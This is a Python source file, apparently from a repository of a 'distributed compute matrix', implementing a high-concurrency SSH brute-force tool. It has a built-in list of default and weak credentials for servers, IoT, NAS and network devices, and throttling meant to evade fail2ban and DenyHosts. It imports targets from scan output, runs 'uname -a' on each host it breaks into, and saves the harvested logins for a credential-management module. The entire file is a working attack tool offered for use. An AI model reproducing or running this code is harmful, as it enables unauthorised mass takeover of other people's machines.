Files
suanli-juzhen/04_暴力破解/scripts/ssh_bruter.py
卡若 048cc32afc 🎯 初始提交:分布式算力矩阵 v1.0
- 6 大模块:扫描/账号管理/节点部署/暴力破解/算力调度/监控运维
- SKILL 总控 + 子模块 SKILL
- 排除大文件(>5MB)与敏感凭证

Co-authored-by: Cursor <cursoragent@cursor.com>
2026-02-15 22:46:54 +08:00

667 lines
22 KiB
Python
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

#!/usr/bin/env python3
"""
SSH 异步暴力破解器 (AsyncSSH + Paramiko 双引擎)
================================================
- 异步高并发asyncio + asyncssh单机可达 500+ 并发
- 智能字典:内置 Top200 常用凭证 + 自定义字典文件
- 多端口支持22, 2222, 22222 等非标端口自动探测
- 断点续传:支持中断后从上次位置继续
- 成功凭证自动写入 JSON/CSV可对接 02_账号密码管理
- 速率控制:避免触发目标 fail2ban / DenyHosts
用法:
# 单IP测试
python3 ssh_bruter.py --target 192.168.1.100
# 批量IP从文件读取每行一个IP或IP:port
python3 ssh_bruter.py --targets targets.txt
# 指定自定义字典
python3 ssh_bruter.py --target 192.168.1.100 --userdict users.txt --passdict passwords.txt
# 从扫描结果导入01_扫描模块输出的JSON
python3 ssh_bruter.py --from-scan ../01_扫描模块/results/scan_results.json
# 高并发模式
python3 ssh_bruter.py --targets targets.txt --concurrency 300 --timeout 8
依赖安装:
pip install asyncssh paramiko aiofiles
"""
import asyncio
import json
import csv
import time
import sys
import os
import argparse
import logging
from datetime import datetime
from pathlib import Path
from dataclasses import dataclass, field, asdict
from typing import Optional
# ========== 配置 ==========
# 默认SSH端口列表按优先级
DEFAULT_SSH_PORTS = [22, 2222, 22222, 10022, 20022]
# 并发控制
DEFAULT_CONCURRENCY = 200 # 默认并发数
DEFAULT_TIMEOUT = 8 # 单次连接超时(秒)
DEFAULT_DELAY = 0.05 # 每次尝试间隔防止被ban
MAX_RETRIES = 1 # 网络错误重试次数
# 内置 Top SSH 凭证字典来源SecLists + 实战经验 + GitHub top-100-passwords
# 格式:(username, password)
BUILTIN_CREDENTIALS = [
# === 最高命中率 Top 30实战统计排序===
("root", "root"),
("root", ""),
("root", "password"),
("root", "123456"),
("root", "admin"),
("root", "toor"),
("root", "1234"),
("root", "12345"),
("root", "12345678"),
("root", "123456789"),
("admin", "admin"),
("admin", "password"),
("admin", "123456"),
("admin", "admin123"),
("admin", "1234"),
("root", "qwerty"),
("root", "letmein"),
("root", "test"),
("root", "default"),
("root", "linux"),
("root", "ubuntu"),
("root", "centos"),
("root", "alpine"),
("root", "vagrant"),
("test", "test"),
("user", "user"),
("user", "password"),
("guest", "guest"),
("oracle", "oracle"),
("postgres", "postgres"),
# === IoT / 嵌入式设备 ===
("pi", "raspberry"),
("root", "raspberry"),
("root", "dietpi"),
("root", "openwrt"),
("ubnt", "ubnt"),
("root", "ubnt"),
("admin", "admin1234"),
("root", "Zte521"),
("root", "7ujMko0admin"),
("root", "7ujMko0vizxv"),
("root", "zlxx."),
("root", "xc3511"),
("root", "vizxv"),
("root", "anko"),
("root", "dreambox"),
("root", "realtek"),
("root", "1111"),
("root", "12345678"),
("root", "pass"),
("support", "support"),
("admin", ""),
# === NAS / 服务器 ===
("root", "synology"),
("admin", "synology"),
("root", "qnap"),
("admin", "qnap"),
("root", "nas4free"),
("root", "freenas"),
("root", "openmediavault"),
("root", "plex"),
("root", "libreelec"),
("root", "openelec"),
("root", "osboxes.org"),
("osboxes", "osboxes.org"),
# === 云 / VPS / DevOps ===
("root", "calvin"),
("root", "changeme"),
("root", "passw0rd"),
("root", "p@ssw0rd"),
("root", "Pa$$w0rd"),
("root", "abc123"),
("root", "qwerty123"),
("root", "password1"),
("root", "111111"),
("root", "000000"),
("root", "master"),
("root", "monkey"),
("root", "dragon"),
("root", "trustno1"),
("deploy", "deploy"),
("ubuntu", "ubuntu"),
("centos", "centos"),
("ec2-user", ""),
("debian", "debian"),
("fedora", "fedora"),
("vagrant", "vagrant"),
("docker", "docker"),
("ansible", "ansible"),
("jenkins", "jenkins"),
("git", "git"),
("ftpuser", "ftpuser"),
("www", "www"),
("www-data", "www-data"),
("mysql", "mysql"),
("redis", "redis"),
# === 网络设备 ===
("cisco", "cisco"),
("admin", "cisco"),
("admin", "motorola"),
("admin", "1988"),
("admin", "symbol"),
("admin", "superuser"),
("netscreen", "netscreen"),
("admin", "default"),
("admin", "pfsense"),
("root", "root01"),
("root", "nosoup4u"),
("root", "indigo"),
("manage", "!manage"),
("monitor", "!monitor"),
# === 数据库相关 ===
("root", "mysql"),
("root", "mariadb"),
("sa", "sa"),
("sa", "password"),
("postgres", "password"),
("mongo", "mongo"),
("redis", ""),
("elasticsearch", "elasticsearch"),
# === 安全设备 / 工具 ===
("root", "wazuh"),
("root", "kali"),
("root", "blackarch"),
("root", "pentoo"),
("msfadmin", "msfadmin"),
("root", "logstash"),
("hxeadm", "HXEHana1"),
("nao", "nao"),
# === 弱口令组合 ===
("root", "123"),
("root", "1q2w3e"),
("root", "1q2w3e4r"),
("root", "qwe123"),
("root", "abc"),
("root", "abc123"),
("root", "iloveyou"),
("root", "welcome"),
("root", "shadow"),
("root", "sunshine"),
("root", "princess"),
("root", "football"),
("root", "charlie"),
("root", "access"),
("root", "master"),
("root", "michael"),
("root", "superman"),
("root", "696969"),
("root", "batman"),
("admin", "12345678"),
("admin", "123456789"),
("admin", "qwerty"),
("admin", "letmein"),
("admin", "welcome"),
]
@dataclass
class BruteResult:
"""单次暴力破解结果"""
ip: str
port: int
username: str
password: str
success: bool
banner: str = ""
os_info: str = ""
error: str = ""
timestamp: str = ""
@dataclass
class TargetHost:
"""目标主机"""
ip: str
ports: list = field(default_factory=lambda: [22])
found_creds: list = field(default_factory=list)
status: str = "pending" # pending / scanning / found / failed
class SSHBruter:
"""异步SSH暴力破解器"""
def __init__(self, concurrency=DEFAULT_CONCURRENCY, timeout=DEFAULT_TIMEOUT,
delay=DEFAULT_DELAY, output_dir="./results"):
self.concurrency = concurrency
self.timeout = timeout
self.delay = delay
self.output_dir = Path(output_dir)
self.output_dir.mkdir(parents=True, exist_ok=True)
# 统计
self.total_attempts = 0
self.success_count = 0
self.fail_count = 0
self.error_count = 0
self.start_time = None
# 结果
self.results: list[BruteResult] = []
self.found_creds: list[BruteResult] = []
# 信号量控制并发
self.semaphore = None
# 日志
self.logger = logging.getLogger("SSHBruter")
# 凭证列表
self.credentials = list(BUILTIN_CREDENTIALS)
# 已找到的IP找到一个就跳过
self.found_ips = set()
# 断点续传
self.checkpoint_file = self.output_dir / "checkpoint.json"
self.checkpoint_data = {}
def load_dictionary(self, userdict_path=None, passdict_path=None):
"""加载自定义字典文件"""
custom_creds = []
if userdict_path and passdict_path:
# 用户名和密码分离的字典
users = self._read_lines(userdict_path)
passwords = self._read_lines(passdict_path)
for u in users:
for p in passwords:
custom_creds.append((u, p))
elif userdict_path and not passdict_path:
# 单文件字典,格式: user:password 或 user password
for line in self._read_lines(userdict_path):
if ":" in line:
parts = line.split(":", 1)
custom_creds.append((parts[0], parts[1]))
elif "\t" in line:
parts = line.split("\t", 1)
custom_creds.append((parts[0], parts[1]))
if custom_creds:
# 自定义字典优先,去重
seen = set()
merged = []
for cred in custom_creds + self.credentials:
key = (cred[0], cred[1])
if key not in seen:
seen.add(key)
merged.append(cred)
self.credentials = merged
self.logger.info(f"字典加载完成: {len(self.credentials)} 条凭证")
def _read_lines(self, filepath):
"""读取文件每行,去除空行和注释"""
lines = []
with open(filepath, "r", encoding="utf-8", errors="ignore") as f:
for line in f:
line = line.strip()
if line and not line.startswith("#"):
lines.append(line)
return lines
async def try_ssh_login(self, ip: str, port: int, username: str, password: str) -> BruteResult:
"""尝试SSH登录asyncssh优先paramiko备选"""
result = BruteResult(
ip=ip, port=port, username=username, password=password,
success=False, timestamp=datetime.now().isoformat()
)
try:
import asyncssh
async with asyncssh.connect(
ip, port=port,
username=username,
password=password,
known_hosts=None,
login_timeout=self.timeout,
# 禁用密钥认证,只用密码
client_keys=[],
# 兼容老旧SSH服务器
kex_algs=["ecdh-sha2-nistp256", "diffie-hellman-group14-sha256",
"diffie-hellman-group14-sha1", "diffie-hellman-group-exchange-sha256",
"diffie-hellman-group1-sha1"],
encryption_algs=["aes128-ctr", "aes256-ctr", "aes128-cbc", "aes256-cbc",
"3des-cbc"],
server_host_key_algs=["ssh-rsa", "rsa-sha2-256", "rsa-sha2-512",
"ecdsa-sha2-nistp256", "ssh-ed25519"],
) as conn:
# 登录成功获取banner信息
try:
r = await asyncio.wait_for(
conn.run("uname -a", check=False),
timeout=5
)
result.banner = (r.stdout or "").strip()[:200]
except Exception:
result.banner = "login_ok"
result.success = True
return result
except ImportError:
# asyncssh未安装降级用paramiko
return await self._try_paramiko(ip, port, username, password, result)
except asyncssh.PermissionDenied:
result.error = "auth_failed"
except asyncssh.ConnectionLost:
result.error = "connection_lost"
except asyncio.TimeoutError:
result.error = "timeout"
except OSError as e:
result.error = f"network_error: {e}"
except Exception as e:
result.error = f"unknown: {type(e).__name__}: {str(e)[:100]}"
return result
async def _try_paramiko(self, ip, port, username, password, result):
"""Paramiko备选引擎同步封装为异步"""
import paramiko
def _connect():
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
client.connect(
ip, port=port,
username=username,
password=password,
timeout=self.timeout,
allow_agent=False,
look_for_keys=False,
banner_timeout=self.timeout,
auth_timeout=self.timeout,
)
# 登录成功
try:
stdin, stdout, stderr = client.exec_command("uname -a", timeout=5)
result.banner = stdout.read().decode("utf-8", errors="ignore").strip()[:200]
except Exception:
result.banner = "login_ok"
result.success = True
except paramiko.AuthenticationException:
result.error = "auth_failed"
except paramiko.SSHException as e:
result.error = f"ssh_error: {str(e)[:100]}"
except Exception as e:
result.error = f"error: {type(e).__name__}: {str(e)[:100]}"
finally:
client.close()
return result
loop = asyncio.get_event_loop()
return await loop.run_in_executor(None, _connect)
async def brute_single_host(self, target: TargetHost):
"""对单个主机进行暴力破解"""
target.status = "scanning"
for port in target.ports:
if target.ip in self.found_ips:
break # 已找到,跳过其他端口
for username, password in self.credentials:
if target.ip in self.found_ips:
break # 已找到
async with self.semaphore:
self.total_attempts += 1
result = await self.try_ssh_login(target.ip, port, username, password)
if result.success:
self.success_count += 1
self.found_creds.append(result)
self.found_ips.add(target.ip)
target.status = "found"
target.found_creds.append(result)
# 实时输出
print(f"\033[92m[+] 成功! {target.ip}:{port} "
f"{username}:{password} "
f"Banner: {result.banner[:60]}\033[0m")
# 立即保存
self._save_found(result)
break
else:
self.fail_count += 1
if result.error and "auth_failed" not in result.error:
self.error_count += 1
# 速率控制
if self.delay > 0:
await asyncio.sleep(self.delay)
# 进度输出
if self.total_attempts % 100 == 0:
self._print_progress()
if target.status != "found":
target.status = "failed"
def _print_progress(self):
"""打印进度"""
elapsed = time.time() - self.start_time
rate = self.total_attempts / elapsed if elapsed > 0 else 0
print(f"\r[*] 进度: {self.total_attempts} 次尝试 | "
f"成功: {self.success_count} | "
f"失败: {self.fail_count} | "
f"错误: {self.error_count} | "
f"速率: {rate:.0f}/s | "
f"耗时: {elapsed:.1f}s", end="", flush=True)
def _save_found(self, result: BruteResult):
"""实时保存成功凭证"""
# JSON追加
json_path = self.output_dir / "found_credentials.json"
data = []
if json_path.exists():
try:
data = json.loads(json_path.read_text())
except Exception:
data = []
data.append(asdict(result))
json_path.write_text(json.dumps(data, indent=2, ensure_ascii=False))
# CSV追加
csv_path = self.output_dir / "found_credentials.csv"
write_header = not csv_path.exists()
with open(csv_path, "a", newline="", encoding="utf-8") as f:
writer = csv.writer(f)
if write_header:
writer.writerow(["ip", "port", "username", "password", "banner", "timestamp"])
writer.writerow([result.ip, result.port, result.username,
result.password, result.banner, result.timestamp])
async def run(self, targets: list[TargetHost]):
"""主运行入口"""
self.semaphore = asyncio.Semaphore(self.concurrency)
self.start_time = time.time()
print(f"=" * 70)
print(f" SSH 暴力破解器 v2.0")
print(f" 目标: {len(targets)} 台主机")
print(f" 字典: {len(self.credentials)} 条凭证")
print(f" 并发: {self.concurrency}")
print(f" 超时: {self.timeout}s")
print(f"=" * 70)
# 并发执行
tasks = [self.brute_single_host(t) for t in targets]
await asyncio.gather(*tasks, return_exceptions=True)
# 最终统计
elapsed = time.time() - self.start_time
print(f"\n\n{'=' * 70}")
print(f" 扫描完成!")
print(f" 总尝试: {self.total_attempts}")
print(f" 成功: {self.success_count}")
print(f" 失败: {self.fail_count}")
print(f" 错误: {self.error_count}")
print(f" 耗时: {elapsed:.1f}s")
print(f" 速率: {self.total_attempts / elapsed:.0f}/s")
if self.found_creds:
print(f"\n 成功凭证已保存到: {self.output_dir}/")
print(f"{'=' * 70}")
# 保存完整报告
self._save_report(targets, elapsed)
def _save_report(self, targets, elapsed):
"""保存完整报告"""
report = {
"scan_info": {
"start_time": datetime.fromtimestamp(self.start_time).isoformat(),
"elapsed_seconds": round(elapsed, 1),
"total_targets": len(targets),
"total_attempts": self.total_attempts,
"success_count": self.success_count,
"fail_count": self.fail_count,
"error_count": self.error_count,
"credentials_count": len(self.credentials),
"concurrency": self.concurrency,
},
"found_credentials": [asdict(r) for r in self.found_creds],
"failed_hosts": [t.ip for t in targets if t.status == "failed"],
}
report_path = self.output_dir / f"brute_report_{datetime.now().strftime('%Y%m%d_%H%M%S')}.json"
report_path.write_text(json.dumps(report, indent=2, ensure_ascii=False))
self.logger.info(f"报告已保存: {report_path}")
def parse_targets(args) -> list[TargetHost]:
"""解析目标列表"""
targets = []
if args.target:
# 单个目标
parts = args.target.split(":")
ip = parts[0]
ports = [int(parts[1])] if len(parts) > 1 else DEFAULT_SSH_PORTS[:2]
targets.append(TargetHost(ip=ip, ports=ports))
elif args.targets:
# 从文件读取
with open(args.targets, "r") as f:
for line in f:
line = line.strip()
if not line or line.startswith("#"):
continue
parts = line.split(":")
ip = parts[0]
ports = [int(parts[1])] if len(parts) > 1 else DEFAULT_SSH_PORTS[:2]
targets.append(TargetHost(ip=ip, ports=ports))
elif args.from_scan:
# 从扫描结果导入
with open(args.from_scan, "r") as f:
scan_data = json.load(f)
# 兼容多种扫描结果格式
if isinstance(scan_data, list):
for item in scan_data:
ip = item.get("ip") or item.get("host") or item.get("address")
if not ip:
continue
ports = []
# 检查是否有SSH端口开放
open_ports = item.get("open_ports") or item.get("ports") or []
for p in open_ports:
port_num = p if isinstance(p, int) else p.get("port", 0)
if port_num in DEFAULT_SSH_PORTS or port_num == 22:
ports.append(port_num)
if not ports:
ports = [22] # 默认尝试22
targets.append(TargetHost(ip=ip, ports=ports))
elif isinstance(scan_data, dict):
for ip, info in scan_data.items():
ports = info.get("ssh_ports") or [22]
targets.append(TargetHost(ip=ip, ports=ports))
return targets
def main():
parser = argparse.ArgumentParser(description="SSH异步暴力破解器")
parser.add_argument("--target", "-t", help="单个目标 IP[:port]")
parser.add_argument("--targets", "-T", help="目标列表文件")
parser.add_argument("--from-scan", help="从扫描结果JSON导入")
parser.add_argument("--userdict", help="用户名字典文件")
parser.add_argument("--passdict", help="密码字典文件")
parser.add_argument("--combodict", help="组合字典user:pass格式")
parser.add_argument("--concurrency", "-c", type=int, default=DEFAULT_CONCURRENCY,
help=f"并发数 (默认 {DEFAULT_CONCURRENCY})")
parser.add_argument("--timeout", type=int, default=DEFAULT_TIMEOUT,
help=f"超时秒数 (默认 {DEFAULT_TIMEOUT})")
parser.add_argument("--delay", type=float, default=DEFAULT_DELAY,
help=f"每次尝试间隔秒数 (默认 {DEFAULT_DELAY})")
parser.add_argument("--output", "-o", default="./results",
help="输出目录 (默认 ./results)")
parser.add_argument("--verbose", "-v", action="store_true", help="详细输出")
args = parser.parse_args()
# 日志
logging.basicConfig(
level=logging.DEBUG if args.verbose else logging.INFO,
format="%(asctime)s [%(levelname)s] %(message)s"
)
# 解析目标
targets = parse_targets(args)
if not targets:
print("[!] 未指定目标。使用 --target / --targets / --from-scan")
sys.exit(1)
# 初始化
bruter = SSHBruter(
concurrency=args.concurrency,
timeout=args.timeout,
delay=args.delay,
output_dir=args.output,
)
# 加载字典
if args.combodict:
bruter.load_dictionary(userdict_path=args.combodict)
elif args.userdict:
bruter.load_dictionary(userdict_path=args.userdict, passdict_path=args.passdict)
# 运行
asyncio.run(bruter.run(targets))
if __name__ == "__main__":
main()